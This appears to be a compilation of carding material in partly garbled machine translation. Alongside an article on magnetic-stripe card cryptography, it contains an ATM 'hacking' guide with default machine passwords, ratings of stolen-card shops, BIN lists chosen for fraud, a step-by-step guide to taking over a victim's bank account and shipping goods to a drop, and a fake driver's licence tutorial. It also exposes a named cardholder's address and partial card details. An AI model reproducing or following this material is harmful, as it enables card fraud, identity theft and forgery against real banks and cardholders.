example if FS higher than 2,5 it's adviced to manager to hold order or claim a call. +Factors of fraud: +1. E-mail Domain - they look provider of your e-mail (if it's free email provider like hotmail.com) +2. Geographic Source-IP A country which IP belongs to and a country you're entering in the shop must be +the same. +3. Anonymous Proxy - if IP of customer in black list. +4 High Risk Country - for example Russia, Ukrain, Moldova, Belorussia, Columbia, Egypt, Indonesia, +Livan, Macedonia +5. Distance-Расстояние - distance between IP location and shipping address. +6. Bin Number Match - country of bank emited the card and country of IP (check by BIN). +9-Carder E-mail - if entered e-mail is in database of famous carders. +10-Open Proxy - check IP on public proxy +11-Spam - checking IP in spam blacklist +And that's the formula for counting FS: +FS = +2.5 * isFreeEmail + +2.5 * countryDoesntMatch + +5 * highRiskCountry + +10 * min(distance,5000) / maxEarthArc + +2 * binDoesntMatch + +5 * carderEmail + +2.5 * proxyScore + +spamScore/3 +maxEarth = 20037. + +Applied Cryptography for Magnetic Stripe cards +1.0 Introduction +The intention of this document is to provide a basic understanding of cryptography and techniques +applied to magnetic stripe cards in the financial industry. +This subject is normally approached with some trepidation by the uninitiated, however it is reasonably +straightforward once the basic principles are explained. +Cryptography is complex, but its practical application is less so. It is not necessary to understand the +mathematics involved in order to successfully use and manage cryptography in a financial environment. +Because of the security implications of card cryptography, it is extremely hard to find information in any +form explaining this application, which adds to the somewhat unnecessary shroud of mystery surrounding +the topic. In early implementations, a measure of additional security was provided by ensuring that few +people knew exactly how these mechanisms worked and this method of operation has permeated into +today?s implementations. +However, none of the information provided in this document will compromise security in any way. +Although other, more secure card tokens are becoming available, the magnetic stripe card is significantly +cheaper than alternatives, and is by far the most common card type in use. Security techniques for +magnetic cards have slowly but steadily improved, and properly implemented can provide perfectly +adequate security for financial transactions in a very cost-effective manner. +2.0 Use of cryptography in financial magnetic stripe cards +The most commonly known use of cryptography is in the provision of a Personal Identification Number, +or PIN, to allow a magnetic stripe card to be used in unattended environments such as ATM?s, or in other +situations where traditional signature checking is inappropriate. This applies equally to credit, debit and +ATM cards. There are not many financial cards in use today that do not have some kind of PIN capability. +A second common use of cryptography is in providing anti-counterfeit mechanisms for the magnetic +stripe. The intention is to prevent fraudulent construction of counterfeit cards by inserting a value on the +magnetic stripe that cannot be derived from other card information. Thus when a card is validated online +this value can be checked to determine whether the card is genuine or a forgery. Several different +standards exist for this mechanism, the most common being the VISA Card Verification Value (CVV) or +the Mastercard equivalent, CVC. For the purposes of this document I will refer to this mechanism as +CVV as this is the term in most common use. +Other uses of cryptography do not directly relate to the card, they generally relate to the encryption of +PIN?s and messages whilst being transmitted in a financial environment to prevent their disclosure or +alteration. +These items will be discussed in more detail in subsequent sections. +3.0 Basic Cryptography + +A basic understanding of cryptographic techniques is required in order to understand this document. +The majority of magnetic card encryption is based on the Data Encryption Algorithm (DEA), usually +called DES or Data Encryption Standard. The idea behind DES is that a clear value is passed to the DES +algorithm, which can be implemented either as software routines or in dedicated hardware. DES then +encrypts the clear value using a key (a secret 64-bit value) and outputs an encrypted value. +The unencrypted input is usually referred to as Cleartext, while the encrypted result is referred to as +Ciphertext. The operation that turns cleartext into ciphertext is known in DES terms as an ?encipher? +operation. +Figure 1 - DES Encipher operation +Note the following: +The DES algorithm is NOT secret. It is publicly available. The Key, however, is secret. +This process is reversible. Executing a DES ?decipher? function using the same key will convert the +ciphertext into cleartext. +A value encrypted with a key is generally referred to as being encrypted ?under? that key. +The security and integrity of the whole operation depends on the secrecy of the key used. The key is a +random value that is strictly protected and never disclosed or written down. Most of the complexity +involved in DES cryptography systems is related to protecting, storing and transmitting keys, and these +activities are referred to as key management. +Note also that the DES encipher operation as described above is not foolproof. In theory, a massively +parallel processor could derive the key in about a days processing. Much is made of this possibility in +discussions on strengthening security, however, additional procedures can be implemented which go +some way towards reducing the effect of this limitation. +If we take a simple example to demonstrate this: computer logon passwords. +Passwords used on computer systems are commonly encrypted after they have been set, and they are +stored in a file in encrypted format. When a user signs on, the password is entered, usually in a hidden +field, in cleartext. It is important to understand that this value is NOT compared against a value that is +deciphered from the password file. The cleartext password in enciphered under the same key and +compared against the enciphered value stored on the password file. Cleartext, enciphered under the same +key, will always provide the same result, and almost all cryptographic validation compares ciphertext to +ciphertext to avoid exposing cleartext values inside computer systems that could be compromised by +memory dumps and so on. +Figure 2 - Password encryption +In this scenario however, a user of a password can always claim that his password can be exposed by +deciphering the enciphered value, and that this is not under his control - and this is true. +Dynamic key exchange +Many financial systems implement dynamic key exchange. While not exclusively relating to magnetic +stripe cards, it is relevant to include it here. +In dynamic key exchange, two parties change keys ?on the fly? to ensure that one key is not used for an +extended period and risks exposure. This is normally used in the financial environment where two hosts +are exchanging financial authorisation messages - for example an acquirer bank and an issuer bank. When +the acquirer bank forwards the PIN to the issuer bank for validation, it must do so encrypted to avoid + +disclosure. Obviously, the issuer will need access to the key used to encrypt the PIN so that it may be +deciphered for validation. These keys will have been previously agreed, and may be changed using +dynamic key exchange where keys are shipped (themselves enciphered under a ?key encryption key?) and +changed frequently in real time for added security. +It must be stressed that no cryptography system is ever completely secure. There are always weaknesses +in any system, both from a technical viewpoint and operationally, where human and operational +procedures may be compromised. +4.0 Practical application of cryptography in Magnetic stripe cards. +The intention of this section is to demonstrate how cryptographic principles are (usually) applied to +magnetic stripe cards in a practical context. +4.1 PIN Processing +The PIN principle is based on the fact that nobody other than the legitimate cardholder has knowledge of +the PIN. Thus when a PIN is provided for a customer: +It must not be stored anywhere in cleartext (except in the secure PIN mailer destined for the customer) +It must not be possible to reverse-engineer the PIN from information on the magnetic stripe or from a +centrally held database. +Normally, a PIN is a 4-digit numeric value. Other schemes exist, but we will use this format for +illustration as it is a common standard. +When a PIN is issued, the sequence of events is as follows: +A 4-digit random number is generated. This is the PIN. +The PIN is combined with other information, such as the account number, to create a block of data for +input to the cryptography process. +The input block is triple encrypted using the PIN working keys +Digits are selected from the ciphertext result. These become the Pin Verification Value or Pin Offset. +The PIN Offset is stored +The PIN mailer is printed +Memory is cleared to binary zeroes to remove all traces of the clear PIN. +At this point, the only place the PIN value exists is inside the PIN mailer. The PIN cannot be derived +from the PIN offset. +When the card is used and the PIN entered, the PIN offset is calculated again from the entered PIN, using +the PIN working keys and compared to the stored offset value to determine if the correct PIN was entered. +Clearly this means that when a PIN is validated, the validating system must have access to the PIN +working keys used during initial PIN issue or subsequent PIN change. +It should be re-emphasised that the offset comprises selected digits from the ciphertext. Typically this +would be 4-6 digits. It is not possible to recreate the keys or derive the PIN from this value. +Notes: + +I.In some implementations, the PIN offset is stored on the magnetic stripe on the card. This is intended to +be used in terminals which can perform local PIN validation. However, this technique is becoming rare as +it prevents deployment of user-selectable PIN?s. +II. Where the user is given the option to change PIN, the new offset is calculated in realtime and written +to the database. Note that if the PIN is forgotten, it cannot be recreated. +III. The method described above is generic. There are many variations, such as the IBM3624 Method-A, +Diebold method, and so on, however the principle remains the same. +IV. In many methods, the framework exists for using different key pairs based on an index value, usually +stored on the magnetic stripe. This is a single digit value denoting the index of the key pair to be used. +The intent is so that a) the same keys are not used across the entire cardbase, and c) that new keys can be +used on re-issue without affecting existing cards. +4.2 CVV processing +It was quickly understood that the proliferation of financial cards exposed institutions to risk from +counterfeiters. In the credit card world, this came from manufacture of cards with or without magnetic +stripe encoding that possessed valid numbers and seemingly valid names and logos. In the ATM card +arena, attackers observed PIN number entry ?over the shoulder?, collated these PIN?s with information +from discarded receipts and so on, and constructed their own magnetic stripes on dummy cards for use at +their leisure with observed PIN numbers. +These threats and others led to the introduction of the Card Verification Value, a non-derivable sequence +of digits constructed by cryptographic process and written to the magnetic stripe of the card. This means +that electronic capture of transactions (either at ATM or Point of Sale) are effectively protected against +counterfeiters. +A combination of static data such as account number is triple encrypted using a special Card Verification +key pair. Selected digits from the result are used to create the CVV, and this is written onto the magnetic +stripe. +Similar comments apply to CVV as those for Pin Offset; As the CVV consists of few digits, and triple +encryption is used, the CVV keys and values are highly secure and presence of a valid CVV provides an +added level of confidence that the card is not counterfeit. +It should be noted that CVV is simply an additional protection method; it is not foolproof. It does not, for +instance, protect against fraudulent captures of magnetic stripe data using, say, fake ATM?s. +A further development of CVV, CVV2, is used for telephone authorisations. A similar (although not +identical) calculation is performed as for CVV, and selected digits from the result are physically printed +on the back of the card. These digits can then be requested by a call centre wishing to determine if the +caller is really in possession of the card. Once again, this is an additional check, and not foolproof. +4.3 Key management +Key management relates to the storage, protection and transmission of keys. A single financial +installation will have many DES keys, and these require careful management if they are not to become +compromised or confused. One of the worst forms of debugging of computer faults is when cryptography +is involved as traces and dumps are meaningless, and it can be very hard to discover that the wrong +cryptography keys are being used! +Keys are normally managed in hierarchies. Keys that are actually used for computation, such as PIN +validation [working keys] are themselves stored in enciphered format under a key encryption key. Other + +key sets will exist for transporting keys from one location to another, such as two nodes in a network. +These are known as transport keys. +In good key management systems, working keys are never stored or exposed in clear format. Even when +they are initially created, they are frequently created by automated process and never known to +individuals. +When initial keys are created, the 64 bits are split between two or more individuals, who then toss a coin +once for each bit required. The two or more individuals then key in their segment of the random key +alone, and thus no one individual ever has sight of a whole key. This method is normally used for initial +master key generation. +Although a simple concept, key management can become quite complex in implementation. +In a simple ATM network for instance, a terminal master key is used to encipher working keys in transit. +A terminal master key (TMK) is generated for each terminal, split into two halves and printed (or +sometimes encoded on a special magnetic card). Each TMK is then installed at their respective ATM?s. +The host system will then download terminal working keys, enciphered under the respective terminal +master key, to each ATM. The terminal working key is then used to encipher PIN data in transit to the +host during normal processing. If required, the terminal working key can be changed at regular intervals +or through dynamic key exchange - but this process requires careful management. +It should be noted that the biggest single security exposure to DES based cryptographic subsystems is in +the exchange of keys, thus good key management procedures are paramount. +4.4 Physical implementation +Cryptographic processing and key management is normally performed in specialised, dedicated secure +hardware. Although DES can be implemented entirely in software (using products such as IBM?s PCF), it +is less secure, and the DES algorithm can be quite processor intensive. +There are companies that specialise in dedicated cryptographic units, such as Racal and Atalla. They are +commonly called HSM?s (Host Security Module) although this is the Racal proprietary name for the unit. +When using these devices, the intent is that all encipher and decipher activity takes place in the secure +unit, and that clear keys and cleartext values are never exposed outside the unit. +Physically, HSM?s are tamper proof and intended for installation in secure computer rooms. Attempts to +open them will result in the destruction of keys contained in the devices. +HSM?s are also capable of generating new random keys and random numbers for use as PIN?s in a secure +manner. +Some applications use physical telecommunications line encryption for added security, and there are a +variety of manufacturers of this type of device. They are effectively ?black box? and require no special +knowledge. +5.0 Examples +5.1 Cryptography in a normal ATM withdrawal +Consider a common ATM transaction: +A customer inserts his card in the ATM +The customer enters his PIN +The customer requests cash +The transaction is approved, cash is dispensed +There?s an awful lot of cryptography going on in this process. For simplicity, we?ll assume the acquiring + +and issuing bank are the same. +The cryptography activity is identified in italics in the sequence: +1. A customer inserts his card in the ATM +The magnetic stripe is read and stored in a buffer in the ATM +2. The customer enters his PIN +The PIN is entered into a tamper-proof PIN pad The stored PIN is stored in a security module in hardware +3. The customer requests cash +The message is constructed in the ATM The PIN (and possibly more) is enciphered under the Terminal +key +The message is sent to the host, possibly enciphered in comms hardware. +On receipt at the host, the comms level encryption is deciphered The CVV is calculated and compared to +the value on the magstripe The PIN under the Terminal key is deciphered The PIN offset or PVV is +calculated The PIN offset or PVV is compared to the database of PVV?s +4. The transaction is approved, cash is dispensed +Note: all the host cryptography functions are normally performed in the Host Security module. No +Cleartext values are exposed to application programs or outside the secure environment. +5.2 Cryptography in an EFTPoS transaction +Even in a signature authorised environment, the CVV from the magnetic stripe can be validated at the +host system to detect counterfeit cards. Clearly this only works in online environments as the CVV +validation requires a cryptographic calculation to be performed at the host. +[Note: It is possible, and some manufacturers support, local key storage on EFTPoS devices and +distributed terminals. Because of the key management complications, these devices are not considered +here] +A more common use of cryptography in EFTPoS environments (and, increasingly in ATM and other +traffic) is the MAC (Message Authentication Code). The MAC check can be thought of as a value +calculated from the contents of all the critical fields in a message (such as card number and amount) and +passed through a cryptographic algorithm. Although the message is carried over transmission lines in +clear, the validation of the MAC field at the recipient will determine whether fields have been tampered +with. [for the technically minded, MAC can be thought of as an encrypted LRC field]. The overhead of +MAC is quite small. (The MAC is defined as 16 bytes in ISO8583). +5.3 Other financial cryptography applications +As well as traditional uses of cryptography as described above, interbank networks (such as SWIFT) have +historically been large users of cryptographic techniques. +A plethora of new delivery mechanisms and far wider distribution of advanced technology to the public +has increased both the interest in and the use of cryptographic techniques. +In cases where cryptography is required for widespread dissemination to the public (such as PC based +home banking) ordinary DES is too complex to manage securely. More appropriate and more secure +algorithms such as RSA (A ?public key? encryption system) have evolved and been deployed in these +environments - they are outside the scope of this paper but review of public key algorithms is especially +encouraged where appropriate. + +Some corporate, EDI and treasury applications use highly secure DES with a combination of techniques - +MAC, physical encryption, dynamic key exchange, smart card key storage and so on. In one +implementation reviewed, the working key is changed every transaction by the result of a MAC key +calculation residue (a so-called ?one time? key system). +ATM Hacking Tutorial +HOW TO HACK THE TRANAX MINIBANK 1500 ATM MACHINE +“ENTER PASSWORD” will be displayed. Enter +Master, Service or Operator Password. +Defaults: +Master =555555 +Service = 222222 +Operator = 111111 +#1- To access the Operator Function menu, hold the , and +keys simultaneously for 2 seconds, release them and press 1, then press 2, then +press 3. The timing of this procedure can be difficult at first. +Note: The Operator Function menu can only be accessed when the machine is either +in service (“swipe your card” screen) or out of service. If the machine is attempting +to connect the host or initializing, you will not be able to use the key commands to +access the Operator Function Menu. +If you have trouble accessing the Operator Menu, power off the ATM and then either +open the vault door or remove the paper from the printer and power back on. This +will force the ATM to the Operator Menu. +2- Once you successfully completed the key +combination, you will be prompted to enter a +password. There are 3 options for passwords. +· Operator Password (allows access to basic +menu structure) +· Service Password (allows access to basic +and diagnostic menus) +· Master Password (allows access to all +menus including setup parameters) +Passwords are very important to maintaining +security for your ATM. Your +dealer/distributor will provide you with +default password information. +3- left is the complete Operator +Function menu, depending on which +password you entered (operators, service, +master) you may not see certain functions. +For example, if you use an operator password +you will not see the Host Setup button, as +you will not have access to that menu. + +good luck. +AUTOMATIC CVV SHOPS RATED +Here il be rating all the automatic CVV selling shops. +vlt.cc - vault market - 95% rating - VERY GOOD +pwnshop.cc - pawn shop - 80% rating - VERY GOOD TO GOOD +cardshop.tv - card shop - 80% rating - VERY GOOD TO GOOD +ccstore.ru - cc store - 75% rating - GOOD +freshstock.biz - fresh stock - 65% rating - OK +ccc.lc - SHOP - 60% rating - OK +All the ratings are based on the +-cvv quality and validity +-how easy funds can be loaded +-the quality of the support being provided by admin and owners of the shop +Please feel free to add and comment on the shops you know. +enjoy +Avs Pass Bins +For people who dont know what non-avs cards are here is the explanation: +AVS (Address Verification System) is used to check if the billing address provided is correct. For +example even if the card details (CCnum, exp.date, 3/4 digit security code) matches the correct info and +the Billing address does not macth, the card is marked as "Declined" and the order does not proccess. +AVS connects to the bank and verifies the info provided. +However some banks do not allow this kind of verification, allowing the carder to input whatever billing +information they want. + +Q) Why are non-avs card so useful? +The answer is very simple. You can just input the shipping address as billing address when carding, +means it would be same, which is a lot higher chance for the stuff to ship. +So here we go. +Visa: +492142 +454623 +453904 +407220 +492942 +477912 +456469 +492942 +456004 +466188 +MasterCard: +523232 +Awesome BINs +Me and my partners have been carding for over 10 to 15 years. +In my base of research over the last 2 years, i have selected these 101 BIN's as being to best card with in +USA, EUROPEAN, ASIAN AND UK SHOPS POS (POINT.OF.SALE) systems. These cards on these +BINs are proven to authorise for swipes of 600usd all the way to 12.5k usd per 1 swipe. +Я и мои партнеры были кардинг более 10 до 15 лет. +В моей базе исследования в течение последних 2 лет, я выбрал эти 101 BIN, как в том, чтобы +лучшая карта в США, европейских и Великобритании МАГАЗИНЫ POS (POINT.OF.SALE) +систем. Эти карты на эти бункеры оказалось разрешение на пойло из 600usd весь путь до 12.5k +долл. США за 1 салфетки. +601100 OK DISCOVER USA +601120 OK DISCOVER USA +601129 OK DISCOVER USA +601130 OK DISCOVER USA +601149 OK DISCOVER USA +603532 1 Citibank (Home Depot) USA +371267 15 AMEX USA GREEN +371268 16 AMEX USA GREEN +371269 14 AMEX USA GREEN +371271 3 AMEX USA GREEN +371273 4 AMEX USA GREEN + +371274 13 AMEX USA GREEN +371275 15 AMEX USA GREEN +371276 42 AMEX USA GREEN +371277 48 AMEX USA GREEN +371278 37 AMEX USA GREEN +371279 28 AMEX USA GREEN +371280 29 AMEX USA GREEN +371281 44 AMEX USA GREEN +371282 47 AMEX USA GREEN +371310 19 AMEX USA BLUE FOR BUSINESS +371311 14 AMEX USA GOLD +371312 19 AMEX USA GOLD +371313 26 AMEX USA GOLD +71319 44 AMEX USA PLATINUM +371320 OK AMEX USA CENTURION +371321 51 AMEX USA PLATINUM +371322 OK AMEX USA PLATINUM +371323 92 AMEX USA SMALL CORPORATE CARD +371324 75 AMEX USA SMALL CORPORATE CARD +371544 38 AMEX USA CENTURION +371545 63 AMEX USA CENTURION +371546 63 AMEX USA CENTURION +371547 30 AMEX USA CENTURION +371548 49 AMEX USA CENTURION +371549 48 AMEX USA CENTURION +400216 1 Teller A.S. Debit PLATINUM Norway Oslo - NEW +400226 20 Blackhawk Community Credit Union Debit CLASSIC United States of America Janesville +Wisconsin WI NEW +400229 1 Capital One Bank (Usa), National Association Credit BUSINESS United States of America +Glen Allen Virginia VA NEW +400264 18 ITS Bank Debit CLASSIC United States of America Johnston Iowa IA NEW +400266 6 Columbia Community Credit Union Debit BUSINESS United States of America Vancouver +Washington WA NEW +400275 20 Fia Card Services, National Association (2) Credit BUSINESS United States of America +Wilmington Delaware DE NEW +400279 2 Sidell State Bank Debit CLASSIC United States of America Sidell Illinois IL NEW +400284 12 First United National Bank Debit CLASSIC United States of America Fryburg Pennsylvania +PA NEW +400292 8 Eecu A Community Credit Union Debit CLASSIC United States of America Jackson Michigan +MI NEW +400309 2 The Bank of Nova Scotia Credit CLASSIC Dominican Republic NEW +400336 24 Peapack-Gladstone Bank Debit CLASSIC United States of America Gladstone New Jersey NJ +NEW +400343 4 West Coast Bank Debit PLATINUM United States of America Lake Oswego Oregon OR NEW +400344 OK Capital One Bank (Usa), National Association Credit PLATINUM United States of America +Glen Allen Virginia VA NEW +400375 15 Silverton Bank, National Association Credit BUSINESS United States of America Atlanta +Georgia GA NEW +400379 3 Fremont Bank Debit BUSINESS United States of America Fremont California CA NEW +400382 2 The Monticello Banking Company Debit BUSINESS United States of America Monticello +Kentucky KY NEW +400600 1 Rockwood Bank Debit CLASSIC United States of America Eureka Missouri MO NEW +400603 27 Signature Bank Debit CLASSIC United States of America Bad Axe Michigan MI NEW +441238 68 First Federal Bank of Ohio Debit CLASSIC United States of America Galion Ohio OH NEW +441241 1 Lancaster Red Rose Credit Union Debit CLASSIC United States of America Lancaster +Pennsylvania PA NEW + +441242 5 Arrowhead Bank Debit CLASSIC United States of America Llano Texas TX NEW +441251 94 Commerce Bancshares, Inc. Debit CLASSIC United States of America Kansas City Missouri +MO NEW +441254 39 Commerce Bancshares, Inc. Credit CLASSIC United States of America Kansas City Missouri +MO NEW +441276 8 Commerce Bancshares, Inc. Debit BUSINESS United States of America Kansas City Missouri +MO NEW +441277 18 Elevations Credit Union Debit CLASSIC United States of America Boulder Colorado CO +NEW +441278 6 Elevations Credit Union Credit CLASSIC United States of America Boulder Colorado CO +NEW +38421 2 |201| PLATINUM (CREDIT) | CITIBANK BERHAD | MALAYSIA +438502 1 |101| CLASSIC (DEBIT) | WELLS FARGO BANK N.A. | USA +438526 1 |101| CLASSIC (DEBIT) | STATE CENTER C.U. | USA +438573 1 |101| CLASSIC (DEBIT) | WELLS FARGO BANK N.A. | USA +438634 1 |101| CLASSIC (DEBIT) | SECURITYPLUS F.C.U. | USA +438688 2 |101| CLASSIC (DEBIT) | MERIWEST C.U. | USA +438736 1 |101| PLATINUM (CREDIT) | MAYO EMPLOYEES F.C.U. | USA +438755 5 |101| CLASSIC (CREDIT) | SAN DIEGO COUNTY C.U. | USA +516319 8 |201| STANDART (DEBIT) | WESTPAC BANKING CORPORATION | AUSTRALIA +516320 1 |201| STANDART () | WESTPAC BANKING CORPORATION | AUSTRALIA +516321 1 |201| () | WESTPAC BANKING CORPORATION | AUSTRALIA +516330 1 |201| STANDART () | WESTPAC BANKING CORPORATION | AUSTRALIA +517669 4 |101| GOLD (DEBIT) | HSBC BANK NEVADA N.A. | USA +517800 11 |101| GOLD (DEBIT) | FIRST PREMIER BANK | USA +517805 96 |101| PLATINUM (DEBIT) | CAPITAL ONE BANK | USA +517873 1 |101| (DEBIT) | CU COOPERATIVE SYSTEMS | USA +517945 1 |101| PLATINUM (DEBIT) | CHASE BANK USA N.A. | USA +450998 46 VALES_INTERCONTINENTALES_S.A. CREDIT GOLD/PREM COSTA_RICA +451477 1 AVAL_CARD_(COSTA_RICA),_S.A. CREDIT PLATINUM COSTA_RICA +454738 1 TARJETAS_CUSCATLAN_S.A. CREDIT BUSINESS COSTA_RICA +492151 16 VALES_INTERCONTINENTALES_S.A. CREDIT CLASSIC COSTA_RICA +493189 2 AVAL_CARD_(COSTA_RICA),_S.A. CREDIT GOLD/PREM COSTA_RICA +493190 2 AVAL_CARD_(COSTA_RICA),_S.A. CREDIT CLASSIC COSTA_RICA +415080 1 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA +415083 3 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA +415086 3 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA +476900 69 ZIONS_FIRST_NATIONAL_BANK CREDIT BUSINESS +UNITED_STATES_OF_AMERICA +477323 1 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA +477324 1 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA +477327 8 WELLS_FARGO_BANK,_N.A. N/A N/A UNITED_STATES_OF_AMERICA +491473 4 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA +491477 3 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA +491485 3 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA +491494 2 ICBA_BANCARD N/A N/A UNITED_STATES_OF_AMERICA +491901 2 NCSC_F.C.U. DEBIT CLASSIC UNITED_STATES_OF_AMERICA + +Bases of thing carding +This article, I hope, will help beginners to answer myself immemorial question ?. To begin with we need +to understand that here, as well as in any business, there is a chain and if simply to hammer somewhere a +card, anybody home won't send the goods to you. As a rule this chain is realized by 2 persons the one +who the goods and that who it accepts a carditis. To the beginner to do simultaneously both that and +another isn't real almost. We will consider these two links more in detail further. +To begin with it is necessary to find shop, it is natural online shop in which we will make purchase. It is +not necessary to be greedy since to receive плазменник with a cinema for 10К it will not turn out for +many reasons. We choose to themselves the type goods ноута or фотика, вобщем by more low 1К- +1.5K ? for beginners it is optimum IMHO. We take a card Further, for purchase it needs to be prepared. +Since to order on the address of its owner doesn't leave and the sense isn't present. It is necessary to order +on дропа. Дроп it is citizen US with whom have dissolved that it has accepted a parcel and has sent it +where will tell and for it has received the 30-50 dollars (+ геморняк on all life forward ? ыыы). But we +will not be hurries up, we will assume at us there is here such card: +name_on_card=mark s messina +address1=60 plainfeild ave +city=west haven +state=CT +zipcode=06516 +country=US +credit_card=4*****0101504612 +exp_month=03 +exp_year=2008 +cvv2=282 +I hope to decipher this field it is necessary to nobody. +Further it is necessary to make Enroll. +For this purpose it is required to us SSN (Social Security Number) + DOB (Day of Birthday) + MMN +(Mother Maiden Name). To find such information it is possible at shEn or ? (as advertizing) By the way +in some banks for энрола, besides the listed data it is necessary ищё nobility PIN or ATM. To pass this +degree of protection extremely difficult and нахрен not нада for such business. To learn to what bank the +card concerns it is possible on a bin, i.e. on the first figures in card number. Use program CC2Bank (read +here this theme - http://www.verified.ru/showthread.php?t=26). We go on a bank site Further, we come +into section Enroll (if you visually can't find this section, испольуйте search on a bank site). We pass all +offered countries Further, stage by stage entering on them the data, an e-mail it is possible to enter any, +Jahu and not Hotmail certainly is desirable not. (I hope that it is necessary to use a proxy etc. it is not +necessary to remind). You have received Online access to a card, here it is possible to look what balance +on a card (it should surpass at least in 2-3 times planned purchase) and there is a section where it is +possible to change the data on a card. (To describe as sections where I will not search for these buttons +etc. ? since it silly, in each bank on a miscellaneous) are called. So if the balance good, goes to section for +change инфы. It is possible to replace only Address1, City, State, Zipcode and Phone number.We take +information of dropa, it will be for example: +70 Tunstill Loop Rd +Fayetteville +TN +37334 +(Thanks xTc for given инфу about the person, which already likely on plank beds). +Open there is phone question on which it is necessary to accept a call from a shop and probably then from +it to call. The blessing for this purpose exists various Ip the Telephony (use Google) where it is possible +to buy external number. We buy phone of the same staff, as дроп. In this case Tennessee. +Further we interrupt the data in a card on ours, will write how many it is necessary to wait for +application ? usually couple of days, but everywhere on a miscellaneous. Therefore a card we will +postpone for a certain time. After the lapse of two days a card it is necessary чекнуть if at you isn't + +present мерчанта near at hand or own x-login ? it is possible to make easier, to go on a type site nero.com +or etc. trading in a software and to buy there not necessary херню for 20 dollars. If payment has passed +successfully ? the card means is live and it is possible шопится. At вбиве a card it is necessary to use the +OLD Name, number, exp and CVV a code, other data we take recently changed. +We go on a site of shop and to affairs the order. (Don't press close to pay as much as possible fast +delivery of the goods.) u????u addresses and шипинг (i.e. deliveries) now identical for the clear reasons. +After the order to you is made will send the letter where will tell that you need to be called or to you will +call, therefore be online (don't forget about time zones). If you can't talk on eng ? ask skilled +прозвонщика. After school ?Hello. My name is Tom. How are you? ? with nasty кацапским accent you +will send нахуй)) Further if by phone you have confirmed the order successfully, to you will give Track +number on which it will be visible (through a site магаза in certain section) as well as where now the +goods and when it will receive дроп. (By the way never call in магаз if you about it haven't asked ? +деклайн it is guaranteed). Then work дроповода, he is necessary for calling дропу with to instruct where +to send the goods, what service etc. ? it is possible to send the goods on the buyer, some home send +themselves =)) This your business already. +Good luck. +Basic ID Making [TUTORIAL] +I will first run down the things that you will need. I am going to tell you what you need to make a +professional looking state driver lisence, you may not need all of this but it is what is needed to make it +look real if you don’t use something that I tell you to it’s your call, your ID may end up looking different +than it should. +• Photo editing software (I personally suggest Adobe Photoshop 6.0 or above) +• Prior knowledge of Photoshop is a must +• State identification template +• A scanner if you need to scan a photo of yourself +• Epson printer (c82 or 820) or a laser printer +• Laminator +• Teslin (Type of teslin depends on what kind of printer you have) +• Magstrip encoder (not a nessecity but to make a professional identification card it is needed) +They’re may be other supplies that you need depending on what state you do, and if it has a hologram, +that will be explained later in the article. +Okay the first step would be to get a template, these are readily available in more than one place IF you +know where to look. Me being the nice guy that I am will help you with that factor. Just search a search +engine (google?) www.google.com or any p2p program should be more than sufficient, otherwise you +may know somebody who will sell them to you or trade them. There are of course other options, you can +make your own, which of course entails tedious work, taking days or even weeks. Or you could scan an +ID that you already have and edit it that way. +Okay so let’s say you have your template and you have photoshop, it’s time to get crackin’. + +So you need to open up photoshop, and start editing your information. Get your picture in the box and +resize the image so you can print. +When it comes time to print it may be a bit difficult. +I am going to assume that you are using single sided Teslin. You will first need to find the coated side of +the Teslin paper, now this may take a little bit of experience to figure it out. The correct side is a bit +smoother than the other. Just put it in between you fingers and rub the paper until you figure out what +side is smoother, if you cant figure it out it’s not a problem, you’ve got a 50% chance of getting it right. +You will know weather or not it was right after you print for obvious reasons, the ink will bleed and look +really bad. In which case you just flip it over and print it on another position on the teslin. +After you have the right side picked out , you might want to mark the corner with a pen. Then place the +teslin in the printer so that it will print on the correct side +Configuring the 8up Template +Now that you are ready to print, you will need the 8up Teslin Template. You can download it here. +After you download it, unzip it and open it in Photoshop. Open your finished template as well. Before +you can print, you need to check the resolution of the temp you are using and match the 8up temp's +resolution to it. To do this, click on the window of your template to make it active, go to the Image menu +and click Image Size. Look at the Resolution. It should have a number like 1200 pixels/inch. That is the +DPI of the temp you are using. +Now, switch over to the 8up temp that you should already have open. Go back to Image Size under the +Image menu. Make sure the Resolution is the same between the two temps. The 8up temp I have hosted +here on this site is already in 1200 DPI, but if you have downloaded it from somewhere else in the past +(such as Brainstorm ID Supply), it may be in 600. If it is not the same, type in the number it should be +and click OK. Photoshop will then convert the 8up temp to the correct resolution. +Copying and Pasting on to the 8up Template +Activate the window of your front template in Photoshop. Under the Select menu, click All. Go to the +Edit menu and click Copy Merged. You should copy it merged since you won't need all those layers just +to print. +Switch over to the 8up temp and go back to the Edit menu and click Paste. You should now have a new +layer in the 8up temp containing your front temp. Select that layer (if it isn't already selected) in the +Layers window. Select the Move tool by either clicking on it in the Tools palette or by pressing V. It will +help if you check the box next to Show Bounding Box at the top. If you don't see this option, go to the +Window menu and click Options. +There are 8 rectangles on the 8up temp (hence the name). Decide where you want to print the front of the +license. When I've got a blank sheet of Teslin, I start by printing the front in the top left. Move the layer +to the rectangle where you want it to print. Do this by simply dragging it with the Move tool. It should +snap into place inside the rectangle. Hopefully, it will be the correct size, but if it isn't you may need to +resize it to fit inside the rectangle by dragging the borders. Remember how you checked the Show +Bounding Box option? This is why. +Adjusting Print Settings +Click Print under the File menu. Click Properties. Now you must adjust the print settings to match the +printer and the Teslin (single or double sided). Here are some settings that I recommend for the printer +that I use: +Epson 820 - Single Sided Teslin - Front: +* Under Mode, Choose Custom +* Click Advanced +* Media Type: Photo Paper +* Ink: Color +* Print Quality: Photo - 2880dpi +* Color Management: No Color Adjustment +* Uncheck Edge Smoothing + +* Uncheck Epson Natural Color +Epson 820 - Single Sided Teslin - Back: +* Under Mode, Choose Custom +* Click Advanced +* Media Type: Matte Paper - Heavyweight +* Ink: Black +* Print Quality: Photo - 1440dpi +* Color Management: No Color Adjustment +* Uncheck Edge Smoothing +* Uncheck Epson Natural Color +Epson C82 - Laser Teslin - Front: +* Choose Matte Paper - Heavyweight +* Choose Photo RPM +* Uncheck all print options except SuperMicroweave +* Select PhotoEnhance +* Set Tone equal to Vivid +* Set Effect to High Sharpness 